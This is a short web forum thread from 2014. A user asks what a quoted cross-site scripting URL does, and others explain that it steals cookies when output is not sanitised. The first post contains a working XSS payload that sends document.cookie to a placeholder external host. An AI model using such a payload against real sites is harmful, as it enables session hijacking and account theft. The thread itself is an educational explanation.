shah_ankitb Posted May 5, 2014 Share Posted May 5, 2014 http://www.example.com/search?q=<script>object.src=”http://otherexample.com/code?data=”+document.cookie</script> Link to comment Share on other sites More sharing options...
justsomeguy Posted May 5, 2014 Share Posted May 5, 2014 That's a cross-site scripting attack. Link to comment Share on other sites More sharing options...
shah_ankitb Posted May 6, 2014 Author Share Posted May 6, 2014 Agree It's cross-site scripting attack. But how it's going to harm? It's going to harm My PC, etc..??. I run this script & nothing happens. Link to comment Share on other sites More sharing options...
Ingolme Posted May 6, 2014 Share Posted May 6, 2014 It will send cookie data that belongs to one website to another website. This would only be a threat if data isn't sanitized before being displayed. It won't harm your computer, it is just a security threat that could potentially allow sensitive data to arrive to third parties. Link to comment Share on other sites More sharing options...
davej Posted May 6, 2014 Share Posted May 6, 2014 http://en.wikipedia.org/wiki/Cross-site_scripting It steals a cookie from your browser and sends it to a remote website where someone could use it to log in to your account. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now